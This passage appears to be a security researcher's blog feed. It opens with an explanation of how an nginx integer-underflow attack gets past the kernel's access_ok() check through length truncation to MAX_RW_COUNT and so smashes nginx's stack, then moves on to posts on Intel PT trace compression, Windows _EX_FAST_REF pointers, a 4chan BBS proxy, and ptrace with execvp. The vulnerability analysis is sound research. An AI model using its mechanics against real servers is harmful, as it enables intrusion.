<div class="highlight"><pre><span></span><code><span class="n">err2</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">move_addr_to_user</span><span class="p">(</span><span class="o">&</span><span class="n">address</span><span class="p">,</span><span class="w"> </span><span class="n">msg</span><span class="p">.</span><span class="n">msg_namelen</span><span class="p">,</span><span class="w"> </span><span class="n">addr</span><span class="p">,</span><span class="w"> </span><span class="n">addr_len</span><span class="p">);</span>
</code></pre></div>
<p>However, we can rule out <code>move_addr_to_user()</code> because it's passed
the number of bytes <em>actually</em> fetched from the socket, which is the same in
our attack regardless of ASLR. This leaves <code>import_single_range()</code>, which is
<a href="http://elixir.free-electrons.com/linux/v4.9-rc4/source/lib/iov_iter.c#L1207">implemented</a>
as follows:</p>
<div class="highlight"><pre><span></span><code><span class="kt">int</span><span class="w"> </span><span class="nf">import_single_range</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">rw</span><span class="p">,</span><span class="w"> </span><span class="kt">void</span><span class="w"> </span><span class="n">__user</span><span class="w"> </span><span class="o">*</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="kt">size_t</span><span class="w"> </span><span class="n">len</span><span class="p">,</span>
<span class="w"> </span><span class="k">struct</span><span class="w"> </span><span class="nc">iovec</span><span class="w"> </span><span class="o">*</span><span class="n">iov</span><span class="p">,</span><span class="w"> </span><span class="k">struct</span><span class="w"> </span><span class="nc">iov_iter</span><span class="w"> </span><span class="o">*</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">len</span><span class="w"> </span><span class="o">></span><span class="w"> </span><span class="n">MAX_RW_COUNT</span><span class="p">)</span>
<span class="w"> </span><span class="n">len</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">MAX_RW_COUNT</span><span class="p">;</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="o">!</span><span class="n">access_ok</span><span class="p">(</span><span class="o">!</span><span class="n">rw</span><span class="p">,</span><span class="w"> </span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">len</span><span class="p">)))</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="o">-</span><span class="n">EFAULT</span><span class="p">;</span>
<span class="w"> </span><span class="n">iov</span><span class="o">-></span><span class="n">iov_base</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">buf</span><span class="p">;</span>
<span class="w"> </span><span class="n">iov</span><span class="o">-></span><span class="n">iov_len</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">len</span><span class="p">;</span>
<span class="w"> </span><span class="n">iov_iter_init</span><span class="p">(</span><span class="n">i</span><span class="p">,</span><span class="w"> </span><span class="n">rw</span><span class="p">,</span><span class="w"> </span><span class="n">iov</span><span class="p">,</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="n">len</span><span class="p">);</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">EXPORT_SYMBOL</span><span class="p">(</span><span class="n">import_single_range</span><span class="p">);</span>
</code></pre></div>
<p>In this function, a sanity check is performed via <code>access_ok()</code> to make sure
the number of bytes requested by the caller cannot cause a write that would
cross into kernel space. But as we pointed out before, the value nginx's worker
is passing here is <code>0xaaaaaaaaaaaaaab0</code>, which should easily cross the boundary
regardless of ASLR. The type <code>size_t</code> is defined as an unsigned 64-bit integer
in our case, so <code>access_ok()</code> should be passed <code>0xaaaaaaaaaaaaaab0</code>, right?
Actually, if we look more closely, we can see the following lines enforce a
limit on <code>len</code>:</p>
<div class="highlight"><pre><span></span><code><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">len</span><span class="w"> </span><span class="o">></span><span class="w"> </span><span class="n">MAX_RW_COUNT</span><span class="p">)</span>
<span class="w"> </span><span class="n">len</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">MAX_RW_COUNT</span><span class="p">;</span>
</code></pre></div>
<p>If we lookup <code>MAX_RW_COUNT</code>, we can see it equals <code>(INT_MAX & PAGE_MASK)</code>,
which turns out to be a 32-bit value. So in other words, even though <code>recvfrom()</code>
allows 64-bit unsigned integer lengths on <code>x86_64</code>, <code>import_single_range()</code> truncates
them into 32-bit unsigned integers! On a 64-bit processor, this truncation
combined with ASLR's relocation of the stack allows our attack to pass the
<code>access_ok()</code> check and smash nginx's stack.</p>
<p>Technically, this isn't a bug from the
kernel's perspective because <code>import_single_range()</code> also calls <code>iov_iter_init()</code>
with the truncated length. This means <code>recvfrom()</code> can only receive up to the truncated
length worth of bytes from the socket and therefore passing the truncated value to
<code>access_ok()</code> is safe.</p>
<p>That said, it's a really odd way of implementing this system call. From the caller's
perspective, it's not made clear that even though it can pass a 64-bit length, only
the lower 32-bits will be considered. Also <code>recvfrom()</code> treats the length as 64-bits
all the way through its logic, so it's not immediately obvious that the length is
being truncated by <code>MAX_RW_COUNT</code>. Additionally, as Hong and I discovered, there
is a security consequence to this choice. Performing the <code>access_ok()</code> check on
the truncated length allows network attacks that rely on integer overflow and
underflow to succeed where they would otherwise more likely be blocked by the kernel
due to a failed system call. We find this to be an interesting consequence since
it results from seemingly unrelated design decisions. It is hard to recommend that
the Linux kernel developers revise <code>import_single_range()</code> given that the real
problem is a bug in nginx and not the Linux kernel itself, but we find this
discovery fascinating regardless.</p>Intel PT Data at Rest: A Compression Experiment2017-10-28T10:30:00-04:002017-10-28T10:30:00-04:00Carter Yagemanntag:carteryagemann.com,2017-10-28:/pt-data-at-rest.html<p><em>Full Disclosure: I am a researcher in Georgia Tech's
<a href="http://istc-arsa.iisp.gatech.edu">ISTC-ARSA</a>, which is funded by
Intel. Although I reference two publications that share Xinyang Ge and Weidong Cui as
authors, I am neither associated with them nor Microsoft Research at the time
of writing.</em></p>
<p>Intel Processor Trace (PT) is a powerful …</p><p><em>Full Disclosure: I am a researcher in Georgia Tech's
<a href="http://istc-arsa.iisp.gatech.edu">ISTC-ARSA</a>, which is funded by
Intel. Although I reference two publications that share Xinyang Ge and Weidong Cui as
authors, I am neither associated with them nor Microsoft Research at the time
of writing.</em></p>
<p>Intel Processor Trace (PT) is a powerful hardware feature for recording the
behavior of CPUs. With it, developers and researchers can monitor the
control-flow path taken by threads, hardware interrupts, and more, all with
cycle-accurate timing. However, this rich stream of data comes at the cost of
size. Depending on what PT is configured to trace, it can output <em>hundreds of
megabytes</em> of data <em>per second per core</em>. PT does take steps to save bandwidth by
only recording changes in control-flow, excluding redundant high-order bits
in target addresses, and compressing returns leading to predictable locations. However,
despite this compression, the volume of data is still massive.</p>
<p>As a consequence, much of the work
published so far handles tracing in one of two ways. One option is to consume the
trace as it is generated. This works as long as the consumer can keep up with the
producer, which is the case in the control-flow integrity (CFI) system
<a href="https://www.microsoft.com/en-us/research/wp-content/uploads/2017/01/griffin-asplos17.pdf">Griffin</a>.
The other common approach is to configure PT to write in a circular
buffer. This option is suitable for crash dump analysis systems like
<a href="https://dl.acm.org/authorize?N47279">Snorlax</a>, which only need a fixed size
window into a thread's past.</p>
<p>However, while some applications are feasible using the two previous methods,
there are still situations were it is desirable to store the entire trace for
postmortem analysis. If nothing else, it is useful for repeatable experiments.
With this in mind, I performed a naive experiment last night to explore if
more can be done to compress PT traces when <em>the data is at rest</em>. Based on the
observations that the compression PT applies is highly localized (i.e. a target
address verses the previously recorded target address and a return verses the
previously recorded call) and that programs often execute repetitive loops,
I hypothesized that even a general purpose compression algorithm should
be able to compress traces with a good ratio.</p>
<h2>Procedure</h2>
<p>The overall idea for the experiment is very simple: gather some PT traces,
compress them with a commonly used algorithm, and compare the sizes.
For a subject I used the simple HTTP server that comes with Python 2.7 to host
a copy of this blog. For each trial I had a crawler request pages from the
server for a set duration. Once the time expired, I terminated the server and
crawler and stopped the tracing. I then compressed the trace using the GNU/Linux
utility <code>gzip</code>, which uses Lempel-Ziv coding. I also fed it through a
disassembler that matches the PT packets to the binary's static code to
produce a linear sequence of instructions. From this I counted the number of
unique basic blocks executed during the trace to serve as a rough proxy for code
coverage. To summarize the procedure:</p>
<ol>
<li>Configure and enable PT tracing.</li>
<li>Start the Python HTTP server.</li>
<li>Start the crawler.</li>
<li>Wait for a specified duration.</li>
<li>Terminate the crawler and server.</li>
<li>Stop PT tracing.</li>
<li>Compress the resulting trace and count the number of unique basic blocks executed.</li>
</ol>
<h2>Results</h2>
<p><center>
<img alt="Figure 1" src="https://carteryagemann.com/images/pt-at-rest-fig1.png">
</center></p>
<p>Comparing the original size of the PT trace to the size after compression
produces the above graph. Both plots best match linear regressions and are
increasing over time. However, the size of the compressed traces increases
at a slower rate than the uncompressed traces, meaning these two plots are
diverging as time increases.</p>
<p>Another observation to note is the large volume of
trace data produced during the server's startup.
This explains why even the shortest trial produced a 1GB trace.
For the same reason, counting the number
of unique basic blocks turned out to not be useful. The number of new basic
blocks executed while serving requests was small.</p>
<p><center>
<img alt="Figure 2" src="https://carteryagemann.com/images/pt-at-rest-fig2.png">
</center></p>
<p>The next graph shows the relationship between the compressed and uncompressed
sizes as a <a href="https://en.wikipedia.org/wiki/Data_compression_ratio#Definitions">space savings</a>
percentage. The plot best fits a linear regression and shows the savings
decreasing over time. This is likely due to the design of the underlying
compression algorithm, which is intended for general use and does not take into
consideration the unique characteristics of PT traces.</p>
<p>To summarize, this experiment shows that more can be done to compress PT traces
for storage at rest.</p>
<h2>Discussion</h2>
<p>It is understandable that the compression used by PT would produce small space
savings compared to general compression algorithms given the limitations of
hardware memory and Intel's very strict performance overhead requirements. In practice,
PT produces an overhead of less than 4% in the worst case, and less
than 2% on average. These numbers are based on my own observations and the results
published by other researchers. In short, PT has very few clock cycles and very
little space available for performing compression.</p>
<p>Another factor that deserves consideration is compression's impact on processing
time. For systems that consume PT traces on the fly, the largest source of
performance overhead is not PT tracing itself but rather the time spent
buffering and consuming it. In CFI, for example, the PT trace has to be
matched with the executed code in order to reconstruct control-flow. This is why
the authors of
<a href="https://www.microsoft.com/en-us/research/wp-content/uploads/2017/01/griffin-asplos17.pdf">Griffin</a>
report a 11.9% overhead on the SPECint benchmark despite the 4% overhead of PT itself.
Adding better space saving compression could increase this overhead further.</p>
<p>That said, for storing PT traces at rest, more can be done to better conserve space.</p>Windows _EX_FAST_REF Pointers and Virtual Machine Introspection2017-08-29T23:00:00-04:002017-08-29T23:00:00-04:00Carter Yagemanntag:carteryagemann.com,2017-08-29:/vmi-windows-fastref.html<p>Last week I was working on a
<a href="https://github.com/carter-yagemann/vmi-unpack">VMI-based malware unpacker</a>
for Linux and Windows when I came across an interesting problem. I was trying
to implement a method that would, given a virtual address and process ID,
return the address range of the memory segment it belongs to using VMI …</p><p>Last week I was working on a
<a href="https://github.com/carter-yagemann/vmi-unpack">VMI-based malware unpacker</a>
for Linux and Windows when I came across an interesting problem. I was trying
to implement a method that would, given a virtual address and process ID,
return the address range of the memory segment it belongs to using VMI.</p>
<p>Implementing this in Linux was no problem for me because it's the OS I'm
most familiar with. The
<a href="https://github.com/carter-yagemann/vmi-unpack/tree/26974ca76505da11a35396dc70f888f374ec88f3/src/process/linux.c#L172">implementation</a>
boils down to getting the current process' <code>task_struct</code>, looking up the
pointer to it's memory mapping (<code>task_struct->mm</code>), and then iterating through its
linked list of virtual memory areas (<code>mm->mmap</code>) until a match is found. Pretty
straight forward.</p>
<p>Windows seemed a little tricker but very similar. The main difference is while
Linux uses a linked list of structures called virtual memory areas, Windows
uses structures called virtual address descriptors (VADs) linked into a
balanced binary tree. The procedure is fairly similar. Once the current executive
process (<code>_EPROCESS</code>) is located in memory, read its <code>VadRoot</code> pointer that, as the name implies,
points to the root of the binary tree of VADs and then check the VAD's memory range.
Lookup the left child if the range is too high, the right child if the range is too low,
and repeat until the desired VAD is located. A straightforward binary search.</p>
<p>So I implemented my VMI function, ran it, and to my surprise it failed. After
some debugging, I discovered that when the code read <code>VadRoot</code>, the pointer
would always be 3 bytes greater than the actual base virtual address of the root VAD. Here are
some examples of addresses that my code read for 64-bit Windows 7, printed in little-endian:</p>
<div class="highlight"><pre><span></span><code><span class="mf">1</span><span class="n">b</span><span class="w"> </span><span class="mf">3</span><span class="n">c</span><span class="w"> </span><span class="mf">90</span><span class="w"> </span><span class="mf">02</span><span class="w"> </span><span class="mf">80</span><span class="w"> </span><span class="n">fa</span><span class="w"> </span><span class="n">ff</span><span class="w"> </span><span class="n">ff</span>
<span class="mf">6</span><span class="n">b</span><span class="w"> </span><span class="mf">3</span><span class="n">d</span><span class="w"> </span><span class="mf">6</span><span class="n">a</span><span class="w"> </span><span class="mf">02</span><span class="w"> </span><span class="mf">80</span><span class="w"> </span><span class="n">fa</span><span class="w"> </span><span class="n">ff</span><span class="w"> </span><span class="n">ff</span>
<span class="mf">3</span><span class="n">b</span><span class="w"> </span><span class="mf">69</span><span class="w"> </span><span class="mf">8</span><span class="n">e</span><span class="w"> </span><span class="mf">01</span><span class="w"> </span><span class="mf">80</span><span class="w"> </span><span class="n">fa</span><span class="w"> </span><span class="n">ff</span><span class="w"> </span><span class="n">ff</span>
</code></pre></div>
<p>Why are the 4 least significant bits always <code>0xb</code> and why was I only having
this problem with the <code>VadRoot</code> pointer and no other pointers? Stumped, I asked
my question to the
<a href="https://groups.google.com/forum/#!topic/vmitools/G4EVxAAE71c">libVMI forum</a>
and the developer of <a href="https://drakvuf.com/">DRAKVUF</a> kindly pointed out the
answer:
<em>the Windows kernel sometimes uses a special pointer called a <code>_EX_FAST_REF</code>.</em></p>
<p>If you take a look at the definition for this type, you will notice something
interesting:</p>
<div class="highlight"><pre><span></span><code><span class="k">typedef</span><span class="w"> </span><span class="k">struct</span><span class="w"> </span><span class="nc">_EX_FAST_REF</span>
<span class="p">{</span>
<span class="w"> </span><span class="k">union</span>
<span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">PVOID</span><span class="w"> </span><span class="n">Object</span><span class="p">;</span>
<span class="w"> </span><span class="n">ULONG</span><span class="w"> </span><span class="n">RefCnt</span><span class="o">:</span><span class="w"> </span><span class="mi">3</span><span class="p">;</span>
<span class="w"> </span><span class="n">ULONG</span><span class="w"> </span><span class="n">Value</span><span class="p">;</span>
<span class="w"> </span><span class="p">};</span>
<span class="p">}</span><span class="w"> </span><span class="n">EX_FAST_REF</span><span class="p">,</span><span class="w"> </span><span class="o">*</span><span class="n">PEX_FAST_REF</span><span class="p">;</span>
</code></pre></div>
<p>As you can see, the Windows kernel uses the 3 least significant bits as a
reference counter. Therefore, in order to read this pointer correctly using
VMI, these bits need to be masked out after reading the pointer. Once I realized
such a pointer existed, the rest of the
<a href="https://github.com/carter-yagemann/vmi-unpack/tree/26974ca76505da11a35396dc70f888f374ec88f3/src/process/windows.c#L170">implementation</a>
was straightforward.</p>
<p>So there you have it. The Windows kernel sometimes uses a special pointer that
stashes a reference counter in the lower bits. Something to watch out for when
you're doing virtual machine introspection. Hopefully this blog post will save
others some time.</p>You never know where your code will end up.2017-07-28T16:30:00-04:002017-07-28T16:30:00-04:00Carter Yagemanntag:carteryagemann.com,2017-07-28:/bbs-4chan.html<p>I was searching through an archive site for 4Chan when I noticed that my name
was in a random post on the Technology board, /g/:</p>
<div class="highlight"><pre><span></span><code>Anonymous Sat Jun 17 11:13:54 2017 No.60943336
>>60943289
I'm running it locally, but you can get it here:
https://github.com …</code></pre></div><p>I was searching through an archive site for 4Chan when I noticed that my name
was in a random post on the Technology board, /g/:</p>
<div class="highlight"><pre><span></span><code>Anonymous Sat Jun 17 11:13:54 2017 No.60943336
>>60943289
I'm running it locally, but you can get it here:
https://github.com/carter-yagemann/4ChanBBS
It uses the official API to retrieve posts, and it even converts images to ASCII
</code></pre></div>
<p>The link is for a public repository I created on Github. It contains a proxy
server written in Python that allows computers to browse 4Chan via a telnet
connection using a command line interface (CLI) reminiscent of old-school
<a href="https://www.wikipedia.org/wiki/Bulletin_board_system">BBS</a> sites. I wrote it
in a few hours purely as a joke and then never touched it again. Everything
about it was intended as nothing more than a quick laugh, down to how it
crudely converts images into ASCII strings so they can be displayed in the
terminal. I didn't put much effort into the project and I assumed no one would
ever care.</p>
<p>But apparently someone did care and that someone owns a retro computer:</p>
<p><img alt="Retro IBM computer running 4Chan BBS" src="https://carteryagemann.com/images/1497712038601.jpg"></p>
<p>Seeing my code's banner page on a monitor old enough to be from the
days of BBS made my day. I don't know the person that posted this image,
but I'm happy to know someone found value in my forgotten code. It just
goes to show that you never know where your code will end up.</p>Intel Processor Trace, execvp, and ptrace2017-03-21T21:15:00-04:002017-03-21T21:15:00-04:00Carter Yagemanntag:carteryagemann.com,2017-03-21:/pt-execvp-ptrace.html<p>Lately, I've been playing around with Intel Processor Trace (PT); a x86
hardware feature that allows for complete tracing of process control flows.
As part of my research, I've been developing my own Linux driver and user
program to control PT.</p>
<p>Tracing can be configured using a handful of model …</p><p>Lately, I've been playing around with Intel Processor Trace (PT); a x86
hardware feature that allows for complete tracing of process control flows.
As part of my research, I've been developing my own Linux driver and user
program to control PT.</p>
<p>Tracing can be configured using a handful of model specific registers (MSRs)
in the Intel CPU. One useful configuration supported by PT is CR3 filtering.
For those readers less familiar with x86 architecture, when a user process is
executed, the CPU's CR3 register holds the physical address of the process's
page table. Since every process has its own page table, each process will also
have a CR3 value that is unique from every other currently scheduled process.
By configuring PT to use a CR3 filter, tracing can be limited to a single
process.</p>
<p>Early versions of my program could only trace already running processes. I would
use the GNU debugger to start the target process and trap its first instruction
and then I would manually feed its PID into my program as an argument. The Linux
driver would then convert the PID into a CR3 by traversing the process's task
structure (<code>virt_to_phys(task_struct->mm_struct->pgd)</code>) and use this address to
configure PT (<code>IA32_RTIT_CR3_MATCH</code>). Needless to say, having to manually start
and trap the target process got very tiring after repeated tracing.</p>
<p>To simplify tracing a process, I wanted my program to take as parameters the
file path of an executable and its arguments and automatically start and trace
the process. My first attempt roughly followed this pseudo code:</p>
<div class="highlight"><pre><span></span><code><span class="n">pid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">fork</span><span class="p">();</span>
<span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pid</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="c1">// Child process</span>
<span class="w"> </span><span class="c1">// Wait for parent to signal that PT is ready</span>
<span class="w"> </span><span class="n">execvp</span><span class="p">(</span><span class="n">target_program</span><span class="p">,</span><span class="w"> </span><span class="n">args</span><span class="p">);</span>
<span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="c1">// Parent process</span>
<span class="w"> </span><span class="n">enable_cr3_filter</span><span class="p">(</span><span class="n">pid</span><span class="p">);</span>
<span class="w"> </span><span class="n">enable_pt</span><span class="p">();</span>
<span class="w"> </span><span class="c1">// Signal child that PT is ready</span>
<span class="p">}</span>
</code></pre></div>
<p>Easy enough, right? I compiled the program, ran my first trace and got...
nothing.</p>
<h2>execvp and CR3</h2>
<p>So what went wrong? It turns out we can demonstrate the problem with a simple
test. Consider this simple C program:</p>
<div class="highlight"><pre><span></span><code><span class="c1">// test_1.c</span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdio.h></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><unistd.h></span>
<span class="kt">void</span><span class="w"> </span><span class="nf">pid_to_cr3</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">m_pid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">getpid</span><span class="p">();</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">pid_str</span><span class="p">[</span><span class="mi">20</span><span class="p">];</span>
<span class="w"> </span><span class="n">snprintf</span><span class="p">(</span><span class="n">pid_str</span><span class="p">,</span><span class="w"> </span><span class="mi">20</span><span class="p">,</span><span class="w"> </span><span class="s">"%d"</span><span class="p">,</span><span class="w"> </span><span class="n">m_pid</span><span class="p">);</span>
<span class="w"> </span><span class="kt">FILE</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">chardev</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">fopen</span><span class="p">(</span><span class="s">"/dev/pid_to_cr3"</span><span class="p">,</span><span class="w"> </span><span class="s">"w"</span><span class="p">);</span>
<span class="w"> </span><span class="n">fputs</span><span class="p">(</span><span class="n">pid_str</span><span class="p">,</span><span class="w"> </span><span class="n">chardev</span><span class="p">);</span>
<span class="w"> </span><span class="n">fclose</span><span class="p">(</span><span class="n">chardev</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span><span class="w"> </span><span class="nf">main</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">argv</span><span class="p">[]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">{</span><span class="s">"./test_2"</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">};</span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">pid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">fork</span><span class="p">();</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pid</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="c1">// Child process</span>
<span class="w"> </span><span class="n">pid_to_cr3</span><span class="p">();</span><span class="w"> </span><span class="c1">// printed to dmesg</span>
<span class="w"> </span><span class="n">execvp</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span><span class="w"> </span><span class="n">argv</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span>
<span class="p">}</span>
</code></pre></div>
<p>In this example, <code>/dev/pid_to_cr3</code> is a simple Linux character device that
processes can write a PID into and it will print the corresponding CR3 value
into the kernel log:</p>
<div class="highlight"><pre><span></span><code><span class="c1">// pid_to_cr3.c</span>
<span class="k">static</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">long</span><span class="w"> </span><span class="nf">pid_to_cr3</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">pid</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">struct</span><span class="w"> </span><span class="nc">task_struct</span><span class="w"> </span><span class="o">*</span><span class="n">task</span><span class="p">;</span>
<span class="w"> </span><span class="k">struct</span><span class="w"> </span><span class="nc">mm_struct</span><span class="w"> </span><span class="o">*</span><span class="n">mm</span><span class="p">;</span>
<span class="w"> </span><span class="kt">void</span><span class="w"> </span><span class="o">*</span><span class="n">cr3_virt</span><span class="p">;</span>
<span class="w"> </span><span class="n">task</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">pid_task</span><span class="p">(</span><span class="n">find_vpid</span><span class="p">(</span><span class="n">pid</span><span class="p">),</span><span class="w"> </span><span class="n">PIDTYPE_PID</span><span class="p">);</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">((</span><span class="kt">uintptr_t</span><span class="p">)</span><span class="w"> </span><span class="n">task</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
<span class="w"> </span><span class="n">mm</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">task</span><span class="o">-></span><span class="n">mm</span><span class="p">;</span>
<span class="w"> </span><span class="c1">// mm can be NULL in cases such as kthreads, in which case we want the active_mm</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">mm</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span>
<span class="w"> </span><span class="n">mm</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">task</span><span class="o">-></span><span class="n">active_mm</span><span class="p">;</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">mm</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
<span class="w"> </span><span class="n">cr3_virt</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="kt">void</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="w"> </span><span class="n">mm</span><span class="o">-></span><span class="n">pgd</span><span class="p">;</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">virt_to_phys</span><span class="p">(</span><span class="n">cr3_virt</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div>
<p>After <code>test_1.c</code> passes its PID to <code>/dev/pid_to_cr3</code>, it then uses <code>execvp</code> to
overwrite its memory with a new program: <code>test_2.c</code>. This program simply passes
its PID to <code>/dev/pid_to_cr3</code> as well:</p>
<div class="highlight"><pre><span></span><code><span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdio.h></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><unistd.h></span>
<span class="kt">void</span><span class="w"> </span><span class="nf">pid_to_cr3</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">m_pid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">getpid</span><span class="p">();</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">pid_str</span><span class="p">[</span><span class="mi">20</span><span class="p">];</span>
<span class="w"> </span><span class="n">snprintf</span><span class="p">(</span><span class="n">pid_str</span><span class="p">,</span><span class="w"> </span><span class="mi">20</span><span class="p">,</span><span class="w"> </span><span class="s">"%d"</span><span class="p">,</span><span class="w"> </span><span class="n">m_pid</span><span class="p">);</span>
<span class="w"> </span><span class="kt">FILE</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">chardev</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">fopen</span><span class="p">(</span><span class="s">"/dev/pid_to_cr3"</span><span class="p">,</span><span class="w"> </span><span class="s">"w"</span><span class="p">);</span>
<span class="w"> </span><span class="n">fputs</span><span class="p">(</span><span class="n">pid_str</span><span class="p">,</span><span class="w"> </span><span class="n">chardev</span><span class="p">);</span>
<span class="w"> </span><span class="n">fclose</span><span class="p">(</span><span class="n">chardev</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span><span class="w"> </span><span class="nf">main</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">pid_to_cr3</span><span class="p">();</span><span class="w"> </span><span class="c1">// printed to dmesg</span>
<span class="p">}</span>
</code></pre></div>
<p>If we compile these source files and execute <code>test_1</code>, we expect that the PID
before and after executing <code>execvp</code> will be the same because <code>execvp</code> causes the
kernel to overwrite the caller's own memory. But what happens to the CR3 value?
As it turns out:</p>
<div class="highlight"><pre><span></span><code>[ 1757.437572] PID 17319 = CR3 18759503872
[ 1757.438414] PID 17319 = CR3 18826612736
</code></pre></div>
<p>Rather than rewriting the existing caller's page table when <code>execvp</code> is called,
the Linux kernel actually allocates and populates an entirely new page table!
Since our original PT program was getting the CR3 <em>before</em> the <code>execvp</code>, our
trace wasn't including the target program's execution.</p>
<h2>ptrace</h2>
<p>So how do we get the CR3 value <em>after</em> <code>execvp</code> is called by the child? We can't
simply have the parent signal the child, like in the first attempt, because any
code we give to the child process will be overwritten when <code>execvp</code> is called.
The solution instead lies in an OS feature known as <code>ptrace</code>. Using <code>ptrace</code>, we
can have the child process attach itself to the parent process for debugging.
When <code>execvp</code> is completed, the OS will pause the child and signal the parent.
The parent can catch this signal using <code>waitpid()</code>, do whatever it needs to do,
and then resume the child. The code looks something like this:</p>
<div class="highlight"><pre><span></span><code><span class="n">pid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">fork</span><span class="p">()</span>
<span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pid</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="c1">// Child process</span>
<span class="w"> </span><span class="n">ptrace</span><span class="p">(</span><span class="n">PTRACE_TRACEME</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">);</span>
<span class="w"> </span><span class="n">execvp</span><span class="p">(</span><span class="n">args</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span><span class="w"> </span><span class="n">args</span><span class="p">);</span>
<span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="c1">// Parent process</span>
<span class="w"> </span><span class="n">waitpid</span><span class="p">(</span><span class="n">pid</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">);</span><span class="w"> </span><span class="c1">// Wait for child to complete execvp()</span>
<span class="w"> </span><span class="n">enable_cr3_filter</span><span class="p">(</span><span class="n">pid</span><span class="p">);</span>
<span class="w"> </span><span class="n">enable_pt</span><span class="p">();</span>
